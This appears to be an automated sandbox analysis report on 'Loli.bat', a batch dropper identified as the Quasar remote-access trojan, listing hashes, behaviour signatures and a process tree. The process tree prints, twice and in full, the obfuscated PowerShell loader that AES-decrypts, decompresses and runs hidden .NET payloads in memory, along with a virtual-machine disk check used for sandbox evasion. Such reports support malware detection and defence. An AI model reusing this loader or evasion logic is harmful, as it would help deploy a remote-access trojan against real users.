Overview

overview

10

Static

static

1

Loli.bat

windows11-21h2-x64

10

Loli.bat

windows7-x64

8

Loli.bat

windows10-2004-x64

10

Loli.bat

windows10-ltsc 2021-x64

10

Loli.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    31-12-2024 04:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Loli.bat

  • Size

    7.2MB

  • MD5

    b052451fc18d2a15c1d83312b55d09a3

  • SHA1

    81ed7f80a894ceaca01153920d3b5e73f593d6a5

  • SHA256

    adf4074b727b1f4914e3d1bd154f5d8672d16688960a77d4262e2c620cf7f890

  • SHA512

    9102cea466aa291c2df1a4f2d69d4cfe71ef7c7dd048f17719757ed317e80b192337894d59c04fdb95c9c92fc1b0568f2049960ee927bc66d6b421e089a8a659

  • SSDEEP

    49152:zHRDNbQ4h2m6rQA3V8VxkTxV824RWYDQhM84IU6ZGnxb6szVaeB8bOYxs4ztgyUv:F

Score
10/10
quasardefense_evasionexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Attributes
  • encryption_key

    03816C045CDE13385E227545D99CA4F0BBE6CC9F

  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

    defense_evasion
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 62 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:640
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:396
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{de9f10a0-159d-470f-9158-cdef41d1b260}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3872
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{31eb60a9-f17c-42df-b210-ef089ace5719}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3064
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:696
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:1000
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:540
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:684
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1044
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1056
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:1084
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                  1⤵
                    PID:1228
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                    1⤵
                      PID:1244
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                      1⤵
                        PID:1292
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                        1⤵
                          PID:1308
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                          1⤵
                            PID:1428
                            • C:\Windows\system32\sihost.exe
                              sihost.exe
                              2⤵
                                PID:3032
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                              1⤵
                              • Indicator Removal: Clear Windows Event Logs
                              PID:1448
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                              1⤵
                                PID:1540
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1552
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                  1⤵
                                    PID:1652
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                    1⤵
                                      PID:1696
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k NetworkService -p
                                      1⤵
                                        PID:1708
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                        1⤵
                                          PID:1808
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          1⤵
                                            PID:1820
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1968
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1992
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                1⤵
                                                  PID:2012
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                  1⤵
                                                    PID:1624
                                                  • C:\Windows\System32\spoolsv.exe
                                                    C:\Windows\System32\spoolsv.exe
                                                    1⤵
                                                      PID:2072
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                      1⤵
                                                        PID:2244
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                        1⤵
                                                          PID:2328
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                          1⤵
                                                            PID:2488
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2496
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkService -p
                                                              1⤵
                                                              • Modifies data under HKEY_USERS
                                                              PID:2520
                                                            • C:\Windows\sysmon.exe
                                                              C:\Windows\sysmon.exe
                                                              1⤵
                                                                PID:2600
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                1⤵
                                                                  PID:2612
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                  1⤵
                                                                    PID:2652
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2664
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                    1⤵
                                                                      PID:2676
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                      1⤵
                                                                        PID:3052
                                                                      • C:\Windows\system32\wbem\unsecapp.exe
                                                                        C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                        1⤵
                                                                          PID:3108
                                                                        • C:\Windows\Explorer.EXE
                                                                          C:\Windows\Explorer.EXE
                                                                          1⤵
                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3312
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"
                                                                            2⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:3588
                                                                            • C:\Windows\System32\Conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              3⤵
                                                                                PID:784
                                                                              • C:\Windows\system32\fsutil.exe
                                                                                fsutil fsinfo drives
                                                                                3⤵
                                                                                  PID:3760
                                                                                • C:\Windows\system32\findstr.exe
                                                                                  findstr /i /c:"WDS100T2B0A" /c:"QEMU HARDDISK" /c:"DADY HARDDISK"
                                                                                  3⤵
                                                                                    PID:5060
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    cmd.exe /c echo function OaEd($Lhlb){ Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$KNIa=[zYSzYyzYszYtzYezYmzY.zYSezYcuzYrzYizYtyzY.zYCzYrzYypzYtzYozYgrzYazYphzYyzY.zYAzYezYszY]:zY:zYCzYrezYazYtezY()zY;'.Replace('zY', ''); Invoke-Expression -WarningAction Inquire -Debug -Verbose '$KNIa.MLWoLWdLWeLW=LW[LWSLWyLWstLWemLW.LWSLWecLWuLWrLWiLWtyLW.LWCLWryLWpLWtoLWgLWrLWaLWpLWhLWy.LWCLWiLWphLWeLWrMLWodLWeLW]:LW:LWCBLWCLW;'.Replace('LW', ''); Invoke-Expression -WarningAction Inquire -Verbose '$KNIa.PHaaHadHadHaiHanHagHa=Ha[SHaysHatHaeHam.HaSHaeHacHaurHaiHatHay.HaCHaryHapHatHaoHagHarHaapHahHayHa.PHaaHaddHainHagHaMoHadHae]Ha:Ha:HaPHaKHaCSHa7;'.Replace('Ha', ''); Invoke-Expression -InformationAction Ignore '$KNIa.KxUexUyxU=xU[xUSxUyxUsxUtexUm.xUCxUoxUnvxUexUrxUtxU]:xU:xUFxUroxUmxUBaxUsxUexU6xU4xUSxUtrxUixUnxUg("FxUbxUbxU4xUmxUoxUUxUOxUGPxUwrxUfxUQxUh1xUrxUlxUKxUcCxUhxUoxUPLxU/xUZxxUnxUsxUMxUmxU4xU6exUixUVxUmVxUrxUjcxU4=xU");'.Replace('xU', ''); Invoke-Expression -Debug '$KNIa.IVBVVB=VB[VBSVByVBsVBtVBemVB.CVBoVBnVBveVBrVBtVB]VB::VBFVBrVBomVBBVBasVBeVB6VB4VBSVBtVBriVBnVBg("lVBlVBuVBFVB/VBpVBeVBMVB9IVBfDVBMVBVVB3oVBHVBUVB3VBC5VBgVB=VB=");'.Replace('VB', ''); $xPYT=$KNIa.CreateDecryptor(); $BQvO=$xPYT.TransformFinalBlock($Lhlb, 0, $Lhlb.Length); $xPYT.Dispose(); $KNIa.Dispose(); $BQvO;}function OkiP($Lhlb){ Invoke-Expression -InformationAction Ignore -Verbose '$ZKQY=Ncdecdwcd-cdOcdbcdjcdecdctcd Scdycdscdtecdmcd.cdIcdO.cdMcdecdmocdrcdyScdtcdrcdecdacdm(,$Lhlb);'.Replace('cd', ''); Invoke-Expression -InformationAction Ignore '$SIsz=Ncdecdwcd-cdOcdbcdjcdecdctcd Scdycdscdtecdmcd.cdIcdO.cdMcdecdmocdrcdyScdtcdrcdecdacdm;'.Replace('cd', ''); Invoke-Expression -Debug -InformationAction Ignore '$Cswx=Nbnebnwbn-bnObnbbnjbnebnctbn Sbnybnsbntebnmbn.bnIbnO.bnCbnobnmpbnrbnesbnsbnibnobnnbn.bnGZbnibnpbnStbnrbneabnm($ZKQY, [bnIbnObn.bnCbnobnmbnpbnrebnssbnibnobnn.bnCbnobnmbnprbnebnsbnsibnobnnMbnobndbnebn]bn:bn:Dbnebncbnombnpbnrebnssbn);'.Replace('bn', ''); $Cswx.CopyTo($SIsz); $Cswx.Dispose(); $ZKQY.Dispose(); $SIsz.Dispose(); $SIsz.ToArray();}function xNUW($Lhlb,$PBcK){ Invoke-Expression -WarningAction Inquire '$ibma=[WNSWNyWNsWNtWNeWNmWN.WNReWNflWNeWNcWNtiWNoWNnWN.WNAsWNsWNeWNmbWNlWNy]WN:WN:WNLWNoWNaWNd([byte[]]$Lhlb);'.Replace('WN', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose -Debug '$mOyP=$ibma.EdXndXtdXrdXydXPdXodXidXntdX;'.Replace('dX', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$mOyP.IFIIFnIFvIFoIFkIFeIF(IF$nIFulIFlIF, $PBcK);'.Replace('IF', '');}$apiD = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $apiD;$fTnD=[System.IO.File]::ReadAllText($apiD).Split([Environment]::NewLine);foreach ($kbxa in $fTnD) { if ($kbxa.StartsWith('dzqCD')) { $XAms=$kbxa.Substring(5); break; }}$JuAS=[string[]]$XAms.Split('\');Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire '$wKg = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');Invoke-Expression -InformationAction Ignore '$qzk = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$LwB = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');xNUW $wKg $null;xNUW $qzk $null;xNUW $LwB (,[string[]] (''));
                                                                                    3⤵
                                                                                      PID:3584
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell.exe -WindowStyle Hidden
                                                                                      3⤵
                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • Drops file in Windows directory
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2576
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\Loli.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
                                                                                        4⤵
                                                                                        • Drops file in Windows directory
                                                                                        PID:3004
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          5⤵
                                                                                            PID:3392
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                                                          4⤵
                                                                                            PID:472
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              5⤵
                                                                                                PID:4684
                                                                                              • C:\Windows\system32\fsutil.exe
                                                                                                fsutil fsinfo drives
                                                                                                5⤵
                                                                                                  PID:1716
                                                                                                • C:\Windows\system32\findstr.exe
                                                                                                  findstr /i /c:"WDS100T2B0A" /c:"QEMU HARDDISK" /c:"DADY HARDDISK"
                                                                                                  5⤵
                                                                                                    PID:1168
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    cmd.exe /c echo function OaEd($Lhlb){ Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$KNIa=[zYSzYyzYszYtzYezYmzY.zYSezYcuzYrzYizYtyzY.zYCzYrzYypzYtzYozYgrzYazYphzYyzY.zYAzYezYszY]:zY:zYCzYrezYazYtezY()zY;'.Replace('zY', ''); Invoke-Expression -WarningAction Inquire -Debug -Verbose '$KNIa.MLWoLWdLWeLW=LW[LWSLWyLWstLWemLW.LWSLWecLWuLWrLWiLWtyLW.LWCLWryLWpLWtoLWgLWrLWaLWpLWhLWy.LWCLWiLWphLWeLWrMLWodLWeLW]:LW:LWCBLWCLW;'.Replace('LW', ''); Invoke-Expression -WarningAction Inquire -Verbose '$KNIa.PHaaHadHadHaiHanHagHa=Ha[SHaysHatHaeHam.HaSHaeHacHaurHaiHatHay.HaCHaryHapHatHaoHagHarHaapHahHayHa.PHaaHaddHainHagHaMoHadHae]Ha:Ha:HaPHaKHaCSHa7;'.Replace('Ha', ''); Invoke-Expression -InformationAction Ignore '$KNIa.KxUexUyxU=xU[xUSxUyxUsxUtexUm.xUCxUoxUnvxUexUrxUtxU]:xU:xUFxUroxUmxUBaxUsxUexU6xU4xUSxUtrxUixUnxUg("FxUbxUbxU4xUmxUoxUUxUOxUGPxUwrxUfxUQxUh1xUrxUlxUKxUcCxUhxUoxUPLxU/xUZxxUnxUsxUMxUmxU4xU6exUixUVxUmVxUrxUjcxU4=xU");'.Replace('xU', ''); Invoke-Expression -Debug '$KNIa.IVBVVB=VB[VBSVByVBsVBtVBemVB.CVBoVBnVBveVBrVBtVB]VB::VBFVBrVBomVBBVBasVBeVB6VB4VBSVBtVBriVBnVBg("lVBlVBuVBFVB/VBpVBeVBMVB9IVBfDVBMVBVVB3oVBHVBUVB3VBC5VBgVB=VB=");'.Replace('VB', ''); $xPYT=$KNIa.CreateDecryptor(); $BQvO=$xPYT.TransformFinalBlock($Lhlb, 0, $Lhlb.Length); $xPYT.Dispose(); $KNIa.Dispose(); $BQvO;}function OkiP($Lhlb){ Invoke-Expression -InformationAction Ignore -Verbose '$ZKQY=Ncdecdwcd-cdOcdbcdjcdecdctcd Scdycdscdtecdmcd.cdIcdO.cdMcdecdmocdrcdyScdtcdrcdecdacdm(,$Lhlb);'.Replace('cd', ''); Invoke-Expression -InformationAction Ignore '$SIsz=Ncdecdwcd-cdOcdbcdjcdecdctcd Scdycdscdtecdmcd.cdIcdO.cdMcdecdmocdrcdyScdtcdrcdecdacdm;'.Replace('cd', ''); Invoke-Expression -Debug -InformationAction Ignore '$Cswx=Nbnebnwbn-bnObnbbnjbnebnctbn Sbnybnsbntebnmbn.bnIbnO.bnCbnobnmpbnrbnesbnsbnibnobnnbn.bnGZbnibnpbnStbnrbneabnm($ZKQY, [bnIbnObn.bnCbnobnmbnpbnrebnssbnibnobnn.bnCbnobnmbnprbnebnsbnsibnobnnMbnobndbnebn]bn:bn:Dbnebncbnombnpbnrebnssbn);'.Replace('bn', ''); $Cswx.CopyTo($SIsz); $Cswx.Dispose(); $ZKQY.Dispose(); $SIsz.Dispose(); $SIsz.ToArray();}function xNUW($Lhlb,$PBcK){ Invoke-Expression -WarningAction Inquire '$ibma=[WNSWNyWNsWNtWNeWNmWN.WNReWNflWNeWNcWNtiWNoWNnWN.WNAsWNsWNeWNmbWNlWNy]WN:WN:WNLWNoWNaWNd([byte[]]$Lhlb);'.Replace('WN', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose -Debug '$mOyP=$ibma.EdXndXtdXrdXydXPdXodXidXntdX;'.Replace('dX', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$mOyP.IFIIFnIFvIFoIFkIFeIF(IF$nIFulIFlIF, $PBcK);'.Replace('IF', '');}$apiD = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $apiD;$fTnD=[System.IO.File]::ReadAllText($apiD).Split([Environment]::NewLine);foreach ($kbxa in $fTnD) { if ($kbxa.StartsWith('dzqCD')) { $XAms=$kbxa.Substring(5); break; }}$JuAS=[string[]]$XAms.Split('\');Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire '$wKg = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');Invoke-Expression -InformationAction Ignore '$qzk = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$LwB = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');xNUW $wKg $null;xNUW $qzk $null;xNUW $LwB (,[string[]] (''));
                                                                                                    5⤵
                                                                                                      PID:2236
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell.exe -WindowStyle Hidden
                                                                                                      5⤵
                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • Drops file in Windows directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:4484
                                                                                                      • C:\Windows\System32\schtasks.exe
                                                                                                        "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
                                                                                                        6⤵
                                                                                                          PID:3068
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            7⤵
                                                                                                              PID:3760
                                                                                                  • C:\Windows\$nya-onimai2\hlPFLa.exe
                                                                                                    "C:\Windows\$nya-onimai2\hlPFLa.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:2192
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      3⤵
                                                                                                        PID:4668
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                    1⤵
                                                                                                      PID:3452
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                      1⤵
                                                                                                        PID:3472
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:3828
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:3896
                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                            1⤵
                                                                                                              PID:3952
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                                              1⤵
                                                                                                                PID:3968
                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                1⤵
                                                                                                                  PID:4196
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                                  1⤵
                                                                                                                    PID:4436
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                    1⤵
                                                                                                                      PID:1368
                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                      1⤵
                                                                                                                        PID:4496
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                        1⤵
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:3748
                                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                        1⤵
                                                                                                                        • Drops file in System32 directory
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:4344
                                                                                                                      • C:\Windows\system32\SppExtComObj.exe
                                                                                                                        C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:4984
                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                          1⤵
                                                                                                                            PID:2168
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                            1⤵
                                                                                                                              PID:2976
                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                              1⤵
                                                                                                                                PID:3136
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                1⤵
                                                                                                                                  PID:3688
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                  1⤵
                                                                                                                                    PID:1608
                                                                                                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                    1⤵
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    PID:1844

                                                                                                                                  Network

                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                  Replay Monitor

                                                                                                                                  Loading Replay Monitor...

                                                                                                                                  Downloads

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                    Filesize

                                                                                                                                    3KB

                                                                                                                                    MD5

                                                                                                                                    da760f8b53fcde92d67d6a610f0a4707

                                                                                                                                    SHA1

                                                                                                                                    8c75b58f43455329c26520540461832bb90bffeb

                                                                                                                                    SHA256

                                                                                                                                    1435d59e62d35d663ae54ca74cebd76a20b00380e3aa189b5d9567cdce7e7528

                                                                                                                                    SHA512

                                                                                                                                    90e62d0fe87dfc7810cbf864d6a984f2b4c24add105f18d375221d2e0f7637f7a1c2e34afe92dcbfccb5a435e8dd6c4ca87a9d79a0fff29bd79a0ac21846e3e0

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                                                                                                    Filesize

                                                                                                                                    1KB

                                                                                                                                    MD5

                                                                                                                                    aedb4691b4a410acfe415bdf5817c0d9

                                                                                                                                    SHA1

                                                                                                                                    acdbec00fdeb48253388f5fa7439e26cbfdebe7d

                                                                                                                                    SHA256

                                                                                                                                    cc4e216fe6e882b37196e3a34129e18d386c2541c6527297b84e0350b212cb42

                                                                                                                                    SHA512

                                                                                                                                    1712ac283dc4675ed270c62a0599302a2f3974e2668d1a6b04216b0819800b3e7bef124ba497767bd12c9f887ce34239eb4508a4220a6ba6e75393a370a8fc4e

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qqpqw0gx.ndw.ps1
                                                                                                                                    Filesize

                                                                                                                                    60B

                                                                                                                                    MD5

                                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                    SHA1

                                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                    SHA256

